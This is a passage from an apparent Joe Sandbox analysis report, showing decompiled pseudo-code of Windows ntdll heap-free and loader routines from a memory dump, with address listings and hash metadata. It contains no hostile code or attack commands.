							_t415 = ( *_t419 & 0x0000ffff) * 8 - 0x10;
							__eflags = _t354 & 0x00000002;
							if((_t354 & 0x00000002) != 0) {
								__eflags = _t415 - 4;
								if(_t415 > 4) {
									_t415 = _t415 - 4;
									__eflags = _t415;
								}
							}
							_t91 =  &(_t419[8]); // -8
							_t262 = E009ED540(_t91, _t415, 0xfeeefeee);
							_v20 = _t262;
							__eflags = _t262 - _t415;
							if(_t262 != _t415) {
								_t357 =  *[fs:0x30];
								__eflags =  *(_t357 + 0xc);
								if( *(_t357 + 0xc) == 0) {
									_push("HEAP: ");
									E0099B150();
								} else {
									E0099B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
								}
								_push(_v20 + 0x10 + _t419);
								E0099B150("HEAP: Free Heap block %p modified at %p after it was freed\n", _t419);
								_t271 =  *[fs:0x30];
								_t421 = _t421 + 0xc;
								__eflags =  *((char*)(_t271 + 2));
								if( *((char*)(_t271 + 2)) != 0) {
									 *0xa86378 = 1;
									asm("int3");
									 *0xa86378 = 0;
								}
							}
						}
						_t381 = _a4;
						_t414 = _t419;
						_t419[1] = 0;
						_t419[3] = 0;
						 *_t381 =  *_t381 + ( *_t419 & 0x0000ffff);
						 *_t419 =  *_t381;
						 *(_t419 + 4 +  *_t381 * 8) =  *_t381 ^  *(_t307 + 0x54);
						L4:
						_t420 = _t414 +  *_t381 * 8;
						if( *(_t307 + 0x4c) == 0) {
							L6:
							while((( *(_t307 + 0x4c) >> 0x00000014 &  *(_t307 + 0x52) ^ _t420[0]) & 0x00000001) == 0) {
								__eflags =  *(_t307 + 0x4c);
								if( *(_t307 + 0x4c) != 0) {
									_t390 =  *(_t307 + 0x50) ^  *_t420;
									 *_t420 = _t390;
									_t328 = _t390 >> 0x00000010 ^ _t390 >> 0x00000008 ^ _t390;
									__eflags = _t390 >> 0x18 - _t328;
									if(__eflags != 0) {
										_push(_t328);
										E00A4FA2B(_t307, _t307, _t420, _t414, _t420, __eflags);
									}
								}
								__eflags = _v5;
								if(_v5 == 0) {
									L94:
									_t382 = _t420[3];
									_t137 =  &(_t420[2]); // -16
									_t309 = _t137;
									_t186 =  *_t309;
									_v20 = _t186;
									_v16 = _t382;
									_t187 =  *((intOrPtr*)(_t186 + 4));
									__eflags =  *_t382 - _t187;
									if( *_t382 != _t187) {
										L63:
										_push(_t309);
										_push( *_t382);
										_push(_t187);
										_push(_t309);
										_push(0xd);
										L64:
										E00A5A80D(_t307);
										continue;
									}
									__eflags =  *_t382 - _t309;
									if( *_t382 != _t309) {
										goto L63;
									}
									 *((intOrPtr*)(_t307 + 0x74)) =  *((intOrPtr*)(_t307 + 0x74)) - ( *_t420 & 0x0000ffff);
									_t393 =  *(_t307 + 0xb4);
									__eflags = _t393;
									if(_t393 == 0) {
										L104:
										_t330 = _v16;
										_t190 = _v20;
										 *_t330 = _t190;
										 *(_t190 + 4) = _t330;
										__eflags = _t420[0] & 0x00000008;
										if((_t420[0] & 0x00000008) == 0) {
											L107:
											_t331 = _t420[0];
											__eflags = _t331 & 0x00000004;
											if((_t331 & 0x00000004) != 0) {
												_t196 = ( *_t420 & 0x0000ffff) * 8 - 0x10;
												_v12 = _t196;
												__eflags = _t331 & 0x00000002;
												if((_t331 & 0x00000002) != 0) {
													__eflags = _t196 - 4;
													if(_t196 > 4) {
														_t196 = _t196 - 4;
														__eflags = _t196;
														_v12 = _t196;
													}
												}
												_t162 =  &(_t420[4]); // -8
												_t197 = E009ED540(_t162, _t196, 0xfeeefeee);
												_v20 = _t197;
												__eflags = _t197 - _v12;
												if(_t197 != _v12) {
													_t335 =  *[fs:0x30];
													__eflags =  *(_t335 + 0xc);
													if( *(_t335 + 0xc) == 0) {
														_push("HEAP: ");
														E0099B150();
													} else {
														E0099B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
													}
													_push(_v20 + 0x10 + _t420);
													E0099B150("HEAP: Free Heap block %p modified at %p after it was freed\n", _t420);
													_t203 =  *[fs:0x30];
													__eflags =  *((char*)(_t203 + 2));
													if( *((char*)(_t203 + 2)) != 0) {
														 *0xa86378 = 1;
														asm("int3");
														 *0xa86378 = 0;
													}
												}
											}
											_t394 = _a4;
											_t414[1] = 0;
											_t414[3] = 0;
											 *_t394 =  *_t394 + ( *_t420 & 0x0000ffff);
											 *_t414 =  *_t394;
											 *(_t414 + 4 +  *_t394 * 8) =  *_t394 ^  *(_t307 + 0x54);
											break;
										}
										_t207 = E009BA229(_t307, _t420);
										__eflags = _t207;
										if(_t207 != 0) {
											goto L107;
										}
										L009BA309(_t307, _t420,  *_t420 & 0x0000ffff, 1);
										continue;
									}
									_t342 =  *_t420 & 0x0000ffff;
									while(1) {
										__eflags = _t342 -  *((intOrPtr*)(_t393 + 4));
										if(_t342 <  *((intOrPtr*)(_t393 + 4))) {
											break;
										}
										_t210 =  *_t393;
										__eflags = _t210;
										if(_t210 == 0) {
											_t212 =  *((intOrPtr*)(_t393 + 4)) - 1;
											__eflags =  *((intOrPtr*)(_t393 + 4)) - 1;
											L103:
											_t146 =  &(_t420[2]); // -16
											E009BBC04(_t307, _t393, 1, _t146, _t212, _t342);
											goto L104;
										}
										_t393 = _t210;
									}
									_t212 = _t342;
									goto L103;
								} else {
									_t384 = _t414[6];
									_t102 =  &(_t414[4]); // -16
									_t311 = _t102;
									_t215 =  *_t311;
									_v20 = _t215;
									_v16 = _t384;
									_t216 =  *((intOrPtr*)(_t215 + 4));
									__eflags =  *_t384 - _t216;
									if( *_t384 != _t216) {
										L92:
										_push(_t311);
										_push( *_t384);
										E00A5A80D(_t307, 0xd, _t311, _t216);
										L93:
										_v5 = 0;
										goto L94;
									}
									__eflags =  *_t384 - _t311;
									if( *_t384 != _t311) {
										goto L92;
									}
									 *((intOrPtr*)(_t307 + 0x74)) =  *((intOrPtr*)(_t307 + 0x74)) - ( *_t414 & 0x0000ffff);
									_t386 =  *(_t307 + 0xb4);
									__eflags = _t386;
									if(_t386 == 0) {
										L79:
										_t313 = _v16;
										_t219 = _v20;
										 *_t313 = _t219;
										 *(_t219 + 4) = _t313;
										__eflags = _t414[1] & 0x00000008;
										if((_t414[1] & 0x00000008) == 0) {
											L82:
											_t314 = _t414[1];
											__eflags = _t314 & 0x00000004;
											if((_t314 & 0x00000004) != 0) {
												_t221 = ( *_t414 & 0x0000ffff) * 8 - 0x10;
												_v12 = _t221;
												__eflags = _t314 & 0x00000002;
												if((_t314 & 0x00000002) != 0) {
													__eflags = _t221 - 4;
													if(_t221 > 4) {
														_t221 = _t221 - 4;
														__eflags = _t221;
														_v12 = _t221;
													}
												}
												_t127 =  &(_t414[8]); // -8
												_t222 = E009ED540(_t127, _t221, 0xfeeefeee);
												_v20 = _t222;
												__eflags = _t222 - _v12;
												if(_t222 != _v12) {
													_t316 =  *[fs:0x30];
													__eflags =  *(_t316 + 0xc);
													if( *(_t316 + 0xc) == 0) {
														_push("HEAP: ");
														E0099B150();
													} else {
														E0099B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
													}
													_push(_v20 + 0x10 + _t414);
													E0099B150("HEAP: Free Heap block %p modified at %p after it was freed\n", _t414);
													_t228 =  *[fs:0x30];
													_t421 = _t421 + 0xc;
													__eflags =  *((char*)(_t228 + 2));
													if( *((char*)(_t228 + 2)) != 0) {
														 *0xa86378 = 1;
														asm("int3");
														 *0xa86378 = 0;
													}
												}
											}
											goto L93;
										}
										_t232 = E009BA229(_t307, _t414);
										__eflags = _t232;
										if(_t232 != 0) {
											goto L82;
										}
										L009BA309(_t307, _t414,  *_t414 & 0x0000ffff, 1);
										goto L93;
									}
									_t323 =  *_t414 & 0x0000ffff;
									while(1) {
										__eflags = _t323 -  *((intOrPtr*)(_t386 + 4));
										if(_t323 <  *((intOrPtr*)(_t386 + 4))) {
											break;
										}
										_t235 =  *_t386;
										__eflags = _t235;
										if(_t235 == 0) {
											_t237 =  *((intOrPtr*)(_t386 + 4)) - 1;
											__eflags =  *((intOrPtr*)(_t386 + 4)) - 1;
											L78:
											_t111 =  &(_t414[4]); // -16
											E009BBC04(_t307, _t386, 1, _t111, _t237, _t323);
											goto L79;
										}
										_t386 = _t235;
									}
									_t237 = _t323;
									goto L78;
								}
							}
							return _t414;
						}
						_t398 =  *(_t307 + 0x50) ^  *_t420;
						_t347 = _t398 >> 0x00000010 ^ _t398 >> 0x00000008 ^ _t398;
						if(_t398 >> 0x18 != _t347) {
							_push(_t347);
							_push(0);
							_push(0);
							_push(_t420);
							_push(3);
							goto L64;
						}
						goto L6;
					} else {
						_t277 =  *_t419 & 0x0000ffff;
						_v16 = _t277;
						while(1) {
							__eflags = _t277 -  *((intOrPtr*)(_t404 + 4));
							if(_t277 <  *((intOrPtr*)(_t404 + 4))) {
								break;
							}
							_t279 =  *_t404;
							__eflags = _t279;
							if(_t279 == 0) {
								_t277 =  *((intOrPtr*)(_t404 + 4)) - 1;
								__eflags =  *((intOrPtr*)(_t404 + 4)) - 1;
								break;
							} else {
								_t404 = _t279;
								_t277 =  *_t419 & 0x0000ffff;
								continue;
							}
						}
						E009BBC04(_t307, _t404, 1, _t350, _t277, _v16);
						goto L20;
					}
				}
			}




















































































                                                                                                                0x009b99ca
                                                                                                                0x009b99cc
                                                                                                                0x009b99df
                                                                                                                0x009b99e3
                                                                                                                0x009b99f8
                                                                                                                0x009b99fb
                                                                                                                0x009b99fb
                                                                                                                0x00000000
                                                                                                                0x009b9a48
                                                                                                                0x009b9a48
                                                                                                                0x009b9a4c
                                                                                                                0x009b9a51
                                                                                                                0x009b9a55
                                                                                                                0x009b9a61
                                                                                                                0x009b9a66
                                                                                                                0x009b9a68
                                                                                                                0x00a01457
                                                                                                                0x00a0145c
                                                                                                                0x00a0145c
                                                                                                                0x009b9a68
                                                                                                                0x009b9a6e
                                                                                                                0x009b9a71
                                                                                                                0x009b9a74
                                                                                                                0x009b9a76
                                                                                                                0x00a01466
                                                                                                                0x00a01469
                                                                                                                0x00a01469
                                                                                                                0x00a0146c
                                                                                                                0x00a0146e
                                                                                                                0x00a01471
                                                                                                                0x00a01474
                                                                                                                0x00a01477
                                                                                                                0x00a01479
                                                                                                                0x00a0159c
                                                                                                                0x00a0159c
                                                                                                                0x00a0159d
                                                                                                                0x00a015a6
                                                                                                                0x00a015ab
                                                                                                                0x00a015ab
                                                                                                                0x00000000
                                                                                                                0x00a015ab
                                                                                                                0x00a0147f
                                                                                                                0x00a01481
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00a0148a
                                                                                                                0x00a0148d
                                                                                                                0x00a01493
                                                                                                                0x00a01495
                                                                                                                0x00a014c0
                                                                                                                0x00a014c0
                                                                                                                0x00a014c3
                                                                                                                0x00a014c6
                                                                                                                0x00a014c8
                                                                                                                0x00a014cb
                                                                                                                0x00a014cf
                                                                                                                0x00a014f2
                                                                                                                0x00a014f2
                                                                                                                0x00a014f5
                                                                                                                0x00a014f8
                                                                                                                0x00a01501
                                                                                                                0x00a01508
                                                                                                                0x00a0150b
                                                                                                                0x00a0150e
                                                                                                                0x00a01510
                                                                                                                0x00a01513
                                                                                                                0x00a01515
                                                                                                                0x00a01515
                                                                                                                0x00a01518
                                                                                                                0x00a01518
                                                                                                                0x00a01513
                                                                                                                0x00a01521
                                                                                                                0x00a01525
                                                                                                                0x00a0152a
                                                                                                                0x00a0152d
                                                                                                                0x00a01530
                                                                                                                0x00a01532
                                                                                                                0x00a01539
                                                                                                                0x00a0153d
                                                                                                                0x00a0155d
                                                                                                                0x00a01562
                                                                                                                0x00a0153f
                                                                                                                0x00a01555
                                                                                                                0x00a0155a
                                                                                                                0x00a01570
                                                                                                                0x00a01577
                                                                                                                0x00a0157c
                                                                                                                0x00a01582
                                                                                                                0x00a01585
                                                                                                                0x00a01589
                                                                                                                0x00a0158b
                                                                                                                0x00a01592
                                                                                                                0x00a01593
                                                                                                                0x00a01593
                                                                                                                0x00a01589
                                                                                                                0x00a01530
                                                                                                                0x00000000
                                                                                                                0x00a014f8
                                                                                                                0x00a014d5
                                                                                                                0x00a014da
                                                                                                                0x00a014dc
                                                                                                                0x00000000
                                                                                                                0x00a014de
                                                                                                                0x00a014e8
                                                                                                                0x00000000
                                                                                                                0x00a014e8
                                                                                                                0x00a01497
                                                                                                                0x00a01497
                                                                                                                0x00a014a4
                                                                                                                0x00a014a4
                                                                                                                0x00a014a7
                                                                                                                0x00a014a9
                                                                                                                0x00a014ab
                                                                                                                0x00a014ab
                                                                                                                0x00a0149c
                                                                                                                0x00a0149e
                                                                                                                0x00a014a0
                                                                                                                0x00a014b0
                                                                                                                0x00a014b0
                                                                                                                0x00000000
                                                                                                                0x00a014a2
                                                                                                                0x00a014a2
                                                                                                                0x00000000
                                                                                                                0x00a014a2
                                                                                                                0x00a014a0
                                                                                                                0x00a014b3
                                                                                                                0x00a014bb
                                                                                                                0x00000000
                                                                                                                0x00a014bb
                                                                                                                0x00a01495
                                                                                                                0x009b9a7c
                                                                                                                0x009b9a7c
                                                                                                                0x009b9a7f
                                                                                                                0x009b9a7f
                                                                                                                0x009b9a82
                                                                                                                0x009b9a84
                                                                                                                0x009b9a87
                                                                                                                0x009b9a8a
                                                                                                                0x009b9a8d
                                                                                                                0x009b9a8f
                                                                                                                0x00a0166a
                                                                                                                0x00a0166a
                                                                                                                0x00a0166b
                                                                                                                0x00a01674
                                                                                                                0x00000000
                                                                                                                0x00a01674
                                                                                                                0x009b9a95
                                                                                                                0x009b9a97
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x009b9aa0
                                                                                                                0x009b9aa3
                                                                                                                0x009b9aa9
                                                                                                                0x009b9aab
                                                                                                                0x009b9ad7
                                                                                                                0x009b9ad7
                                                                                                                0x009b9ada
                                                                                                                0x009b9add
                                                                                                                0x009b9adf
                                                                                                                0x009b9ae2
                                                                                                                0x009b9ae6
                                                                                                                0x009b9b22
                                                                                                                0x009b9b27
                                                                                                                0x009b9b29
                                                                                                                0x00000000
                                                                                                                0x009b9b2b
                                                                                                                0x00a015be
                                                                                                                0x00000000
                                                                                                                0x00a015be
                                                                                                                0x009b9b29
                                                                                                                0x009b9ae8
                                                                                                                0x009b9ae8
                                                                                                                0x009b9aeb
                                                                                                                0x009b9aee
                                                                                                                0x00a015cb
                                                                                                                0x00a015d2
                                                                                                                0x00a015d5
                                                                                                                0x00a015d7
                                                                                                                0x00a015da
                                                                                                                0x00a015dc
                                                                                                                0x00a015dc
                                                                                                                0x00a015dc
                                                                                                                0x00a015da
                                                                                                                0x00a015e5
                                                                                                                0x00a015e9
                                                                                                                0x00a015ee
                                                                                                                0x00a015f1
                                                                                                                0x00a015f3
                                                                                                                0x00a015f9
                                                                                                                0x00a01600
                                                                                                                0x00a01604
                                                                                                                0x00a01624
                                                                                                                0x00a01629
                                                                                                                0x00a01606
                                                                                                                0x00a0161c
                                                                                                                0x00a01621
                                                                                                                0x00a01637
                                                                                                                0x00a0163e
                                                                                                                0x00a01643
                                                                                                                0x00a01649
                                                                                                                0x00a0164c
                                                                                                                0x00a01650
                                                                                                                0x00a01656
                                                                                                                0x00a0165d
                                                                                                                0x00a0165e
                                                                                                                0x00a0165e
                                                                                                                0x00a01650
                                                                                                                0x00a015f3
                                                                                                                0x009b9af4
                                                                                                                0x009b9af7
                                                                                                                0x009b9afc
                                                                                                                0x009b9b00
                                                                                                                0x009b9b04
                                                                                                                0x009b9b08
                                                                                                                0x009b9b14
                                                                                                                0x009b99fe
                                                                                                                0x009b9a04
                                                                                                                0x009b9a07
                                                                                                                0x00000000
                                                                                                                0x009b9a29
                                                                                                                0x00a0169c
                                                                                                                0x00a016a0
                                                                                                                0x00a016a5
                                                                                                                0x00a016a9
                                                                                                                0x00a016b5
                                                                                                                0x00a016ba
                                                                                                                0x00a016bc
                                                                                                                0x00a016be
                                                                                                                0x00a016c3
                                                                                                                0x00a016c3
                                                                                                                0x00a016bc
                                                                                                                0x00a016c8
                                                                                                                0x00a016cc
                                                                                                                0x00a0181b
                                                                                                                0x00a0181b
                                                                                                                0x00a0181e
                                                                                                                0x00a0181e
                                                                                                                0x00a01821
                                                                                                                0x00a01823
                                                                                                                0x00a01826
                                                                                                                0x00a01829
                                                                                                                0x00a0182c
                                                                                                                0x00a0182e
                                                                                                                0x00a01688
                                                                                                                0x00a01688
                                                                                                                0x00a01689
                                                                                                                0x00a0168b
                                                                                                                0x00a0168c
                                                                                                                0x00a0168d
                                                                                                                0x00a0168f
                                                                                                                0x00a01692
                                                                                                                0x00000000
                                                                                                                0x00a01692
                                                                                                                0x00a01834
                                                                                                                0x00a01836
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00a0183f
                                                                                                                0x00a01842
                                                                                                                0x00a01848
                                                                                                                0x00a0184a
                                                                                                                0x00a01875
                                                                                                                0x00a01875
                                                                                                                0x00a01878
                                                                                                                0x00a0187b
                                                                                                                0x00a0187d
                                                                                                                0x00a01880
                                                                                                                0x00a01884
                                                                                                                0x00a018a7
                                                                                                                0x00a018a7
                                                                                                                0x00a018aa
                                                                                                                0x00a018ad
                                                                                                                0x00a018b6
                                                                                                                0x00a018bd
                                                                                                                0x00a018c0
                                                                                                                0x00a018c3
                                                                                                                0x00a018c5
                                                                                                                0x00a018c8
                                                                                                                0x00a018ca
                                                                                                                0x00a018ca
                                                                                                                0x00a018cd
                                                                                                                0x00a018cd
                                                                                                                0x00a018c8
                                                                                                                0x00a018d5
                                                                                                                0x00a018da
                                                                                                                0x00a018df
                                                                                                                0x00a018e2
                                                                                                                0x00a018e5
                                                                                                                0x00a018e7
                                                                                                                0x00a018ee
                                                                                                                0x00a018f2
                                                                                                                0x00a01912
                                                                                                                0x00a01917
                                                                                                                0x00a018f4
                                                                                                                0x00a0190a
                                                                                                                0x00a0190f
                                                                                                                0x00a01925
                                                                                                                0x00a0192c
                                                                                                                0x00a01931
                                                                                                                0x00a0193a
                                                                                                                0x00a0193e
                                                                                                                0x00a01940
                                                                                                                0x00a01947
                                                                                                                0x00a01948
                                                                                                                0x00a01948
                                                                                                                0x00a0193e
                                                                                                                0x00a018e5
                                                                                                                0x00a0194f
                                                                                                                0x00a01952
                                                                                                                0x00a01956
                                                                                                                0x00a0195d
                                                                                                                0x00a01961
                                                                                                                0x00a0196d
                                                                                                                0x00000000
                                                                                                                0x00a0196d
                                                                                                                0x00a0188a
                                                                                                                0x00a0188f
                                                                                                                0x00a01891
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00a0189d
                                                                                                                0x00000000
                                                                                                                0x00a0189d
                                                                                                                0x00a0184c
                                                                                                                0x00a01859
                                                                                                                0x00a01859
                                                                                                                0x00a0185c
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00a01851
                                                                                                                0x00a01853
                                                                                                                0x00a01855
                                                                                                                0x00a01865
                                                                                                                0x00a01865
                                                                                                                0x00a01866
                                                                                                                0x00a01868
                                                                                                                0x00a01870
                                                                                                                0x00000000
                                                                                                                0x00a01870
                                                                                                                0x00a01857
                                                                                                                0x00a01857
                                                                                                                0x00a0185e
                                                                                                                0x00000000
                                                                                                                0x00a016d2
                                                                                                                0x00a016d2
                                                                                                                0x00a016d5
                                                                                                                0x00a016d5
                                                                                                                0x00a016d8
                                                                                                                0x00a016da
                                                                                                                0x00a016dd
                                                                                                                0x00a016e0
                                                                                                                0x00a016e3
                                                                                                                0x00a016e5
                                                                                                                0x00a01808
                                                                                                                0x00a01808
                                                                                                                0x00a01809
                                                                                                                0x00a01812
                                                                                                                0x00a01817
                                                                                                                0x00a01817
                                                                                                                0x00000000
                                                                                                                0x00a01817
                                                                                                                0x00a016eb
                                                                                                                0x00a016ed
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00a016f6
                                                                                                                0x00a016f9
                                                                                                                0x00a016ff
                                                                                                                0x00a01701
                                                                                                                0x00a0172c
                                                                                                                0x00a0172c
                                                                                                                0x00a0172f
                                                                                                                0x00a01732
                                                                                                                0x00a01734
                                                                                                                0x00a01737
                                                                                                                0x00a0173b
                                                                                                                0x00a0175e
                                                                                                                0x00a0175e
                                                                                                                0x00a01761
                                                                                                                0x00a01764
                                                                                                                0x00a0176d
                                                                                                                0x00a01774
                                                                                                                0x00a01777
                                                                                                                0x00a0177a
                                                                                                                0x00a0177c
                                                                                                                0x00a0177f
                                                                                                                0x00a01781
                                                                                                                0x00a01781
                                                                                                                0x00a01784
                                                                                                                0x00a01784
                                                                                                                0x00a0177f
                                                                                                                0x00a0178c
                                                                                                                0x00a01791
                                                                                                                0x00a01796
                                                                                                                0x00a01799
                                                                                                                0x00a0179c
                                                                                                                0x00a0179e
                                                                                                                0x00a017a5
                                                                                                                0x00a017a9
                                                                                                                0x00a017c9
                                                                                                                0x00a017ce
                                                                                                                0x00a017ab
                                                                                                                0x00a017c1
                                                                                                                0x00a017c6
                                                                                                                0x00a017dc
                                                                                                                0x00a017e3
                                                                                                                0x00a017e8
                                                                                                                0x00a017ee
                                                                                                                0x00a017f1
                                                                                                                0x00a017f5
                                                                                                                0x00a017f7
                                                                                                                0x00a017fe
                                                                                                                0x00a017ff
                                                                                                                0x00a017ff
                                                                                                                0x00a017f5
                                                                                                                0x00a0179c
                                                                                                                0x00000000
                                                                                                                0x00a01764
                                                                                                                0x00a01741
                                                                                                                0x00a01746
                                                                                                                0x00a01748
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00a01754
                                                                                                                0x00000000
                                                                                                                0x00a01754
                                                                                                                0x00a01703
                                                                                                                0x00a01710
                                                                                                                0x00a01710
                                                                                                                0x00a01713
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00a01708
                                                                                                                0x00a0170a
                                                                                                                0x00a0170c
                                                                                                                0x00a0171c
                                                                                                                0x00a0171c
                                                                                                                0x00a0171d
                                                                                                                0x00a0171f
                                                                                                                0x00a01727
                                                                                                                0x00000000
                                                                                                                0x00a01727
                                                                                                                0x00a0170e
                                                                                                                0x00a0170e
                                                                                                                0x00a01715
                                                                                                                0x00000000
                                                                                                                0x00a01715
                                                                                                                0x00a016cc
                                                                                                                0x009b9a45
                                                                                                                0x009b9a45
                                                                                                                0x009b9a0e
                                                                                                                0x009b9a1c
                                                                                                                0x009b9a23
                                                                                                                0x00a0167e
                                                                                                                0x00a0167f
                                                                                                                0x00a01681
                                                                                                                0x00a01683
                                                                                                                0x00a01684
                                                                                                                0x00000000
                                                                                                                0x00a01684
                                                                                                                0x00000000
                                                                                                                0x009b9aad
                                                                                                                0x009b9aad
                                                                                                                0x009b9ab0
                                                                                                                0x009b9ab3
                                                                                                                0x009b9ab3
                                                                                                                0x009b9ab6
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x009b9ab8
                                                                                                                0x009b9aba
                                                                                                                0x009b9abc
                                                                                                                0x009b9ac8
                                                                                                                0x009b9ac8
                                                                                                                0x00000000
                                                                                                                0x009b9abe
                                                                                                                0x009b9abe
                                                                                                                0x009b9ac0
                                                                                                                0x00000000
                                                                                                                0x009b9ac0
                                                                                                                0x009b9abc
                                                                                                                0x009b9ad2
                                                                                                                0x00000000
                                                                                                                0x009b9ad2
                                                                                                                0x009b9aab

                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.274348250.0000000000970000.00000040.00000001.sdmp, Offset: 00970000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_1_2_970000_UGGJ4NnzFz.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                                                                                                • API String ID: 0-3178619729
                                                                                                                • Opcode ID: 6e5b344354d35abe3c90c3e98db966e99e3a9a870ef6353d724baecd312423e1
                                                                                                                • Instruction ID: ce4c7d2749c844147f3ab91829d906d0a5d92a4dc6bffdf2e38b8b4ce2e2ee14
                                                                                                                • Opcode Fuzzy Hash: 6e5b344354d35abe3c90c3e98db966e99e3a9a870ef6353d724baecd312423e1
                                                                                                                • Instruction Fuzzy Hash: FF223470A002499FDB24CF28D895BBABBF5EF85704F24C569E4468B382E775EC85CB50
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 009A8794, Relevance: 4.0, Strings: 3, Instructions: 255COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 83%
                                                                                                                			E009A8794(void* __ecx) {
				signed int _v0;
				char _v8;
				signed int _v12;
				void* _v16;
				signed int _v20;
				intOrPtr _v24;
				signed int _v28;
				signed int _v32;
				signed int _v40;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr* _t77;
				signed int _t80;
				signed char _t81;
				signed int _t87;
				signed int _t91;
				void* _t92;
				void* _t94;
				signed int _t95;
				signed int _t103;
				signed int _t105;
				signed int _t110;
				signed int _t118;
				intOrPtr* _t121;
				intOrPtr _t122;
				signed int _t125;
				signed int _t129;
				signed int _t131;
				signed int _t134;
				signed int _t136;
				signed int _t143;
				signed int* _t147;
				signed int _t151;
				void* _t153;
				signed int* _t157;
				signed int _t159;
				signed int _t161;
				signed int _t166;
				signed int _t168;

				_push(__ecx);
				_t153 = __ecx;
				_t159 = 0;
				_t121 = __ecx + 0x3c;
				if( *_t121 == 0) {
					L2:
					_t77 =  *((intOrPtr*)(_t153 + 0x58));
					if(_t77 == 0 ||  *_t77 ==  *((intOrPtr*)(_t153 + 0x54))) {
						_t122 =  *((intOrPtr*)(_t153 + 0x20));
						_t180 =  *((intOrPtr*)(_t122 + 0x3a));
						if( *((intOrPtr*)(_t122 + 0x3a)) != 0) {
							L6:
							if(E009A934A() != 0) {
								_t159 = E00A1A9D2( *((intOrPtr*)( *((intOrPtr*)(_t153 + 0x20)) + 0x18)), 0, 0);
								__eflags = _t159;
								if(_t159 < 0) {
									_t81 =  *0xa85780; // 0x0
									__eflags = _t81 & 0x00000003;
									if((_t81 & 0x00000003) != 0) {
										_push(_t159);
										E00A15510("minkernel\\ntdll\\ldrsnap.c", 0x235, "LdrpDoPostSnapWork", 0, "LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x\n",  *((intOrPtr*)( *((intOrPtr*)(_t153 + 0x20)) + 0x18)));
										_t81 =  *0xa85780; // 0x0
									}
									__eflags = _t81 & 0x00000010;
									if((_t81 & 0x00000010) != 0) {
										asm("int3");
									}
								}
							}
						} else {
							_t159 = E009A849B(0, _t122, _t153, _t159, _t180);
							if(_t159 >= 0) {
								goto L6;
							}
						}
						_t80 = _t159;
						goto L8;
					} else {
						_t125 = 0x13;
						asm("int 0x29");
						_push(0);
						_push(_t159);
						_t161 = _t125;
						_t87 =  *( *[fs:0x30] + 0x1e8);
						_t143 = 0;
						_v40 = _t161;
						_t118 = 0;
						_push(_t153);
						__eflags = _t87;
						if(_t87 != 0) {
							_t118 = _t87 + 0x5d8;
							__eflags = _t118;
							if(_t118 == 0) {
								L46:
								_t118 = 0;
							} else {
								__eflags =  *(_t118 + 0x30);
								if( *(_t118 + 0x30) == 0) {
									goto L46;
								}
							}
						}
						_v32 = 0;
						_v28 = 0;
						_v16 = 0;
						_v20 = 0;
						_v12 = 0;
						__eflags = _t118;
						if(_t118 != 0) {
							__eflags = _t161;
							if(_t161 != 0) {
								__eflags =  *(_t118 + 8);
								if( *(_t118 + 8) == 0) {
									L22:
									_t143 = 1;
									__eflags = 1;
								} else {
									_t19 = _t118 + 0x40; // 0x40
									_t156 = _t19;
									E009A8999(_t19,  &_v16);
									__eflags = _v0;
									if(_v0 != 0) {
										__eflags = _v0 - 1;
										if(_v0 != 1) {
											goto L22;
										} else {
											_t128 =  *(_t161 + 0x64);
											__eflags =  *(_t161 + 0x64);
											if( *(_t161 + 0x64) == 0) {
												goto L22;
											} else {
												E009A8999(_t128,  &_v12);
												_t147 = _v12;
												_t91 = 0;
												__eflags = 0;
												_t129 =  *_t147;
												while(1) {
													__eflags =  *((intOrPtr*)(0xa85c60 + _t91 * 8)) - _t129;
													if( *((intOrPtr*)(0xa85c60 + _t91 * 8)) == _t129) {
														break;
													}
													_t91 = _t91 + 1;
													__eflags = _t91 - 5;
													if(_t91 < 5) {
														continue;
													} else {
														_t131 = 0;
														__eflags = 0;
													}
													L37:
													__eflags = _t131;
													if(_t131 != 0) {
														goto L22;
													} else {
														__eflags = _v16 - _t147;
														if(_v16 != _t147) {
															goto L22;
														} else {
															E009B2280(_t92, 0xa886cc);
															_t94 = E00A69DFB( &_v20);
															__eflags = _t94 - 1;
															if(_t94 != 1) {
															}
															asm("movsd");
															asm("movsd");
															asm("movsd");
															asm("movsd");
															 *_t118 =  *_t118 + 1;
															asm("adc dword [ebx+0x4], 0x0");
															_t95 = E009C61A0( &_v32);
															__eflags = _t95;
															if(_t95 != 0) {
																__eflags = _v32 | _v28;
																if((_v32 | _v28) != 0) {
																	_t71 = _t118 + 0x40; // 0x3f
																	_t134 = _t71;
																	goto L55;
																}
															}
															goto L30;
														}
													}
													goto L56;
												}
												_t92 = 0xa85c64 + _t91 * 8;
												asm("lock xadd [eax], ecx");
												_t131 = (_t129 | 0xffffffff) - 1;
												goto L37;
											}
										}
										goto L56;
									} else {
										_t143 = E009A8A0A( *((intOrPtr*)(_t161 + 0x18)),  &_v12);
										__eflags = _t143;
										if(_t143 != 0) {
											_t157 = _v12;
											_t103 = 0;
											__eflags = 0;
											_t136 =  &(_t157[1]);
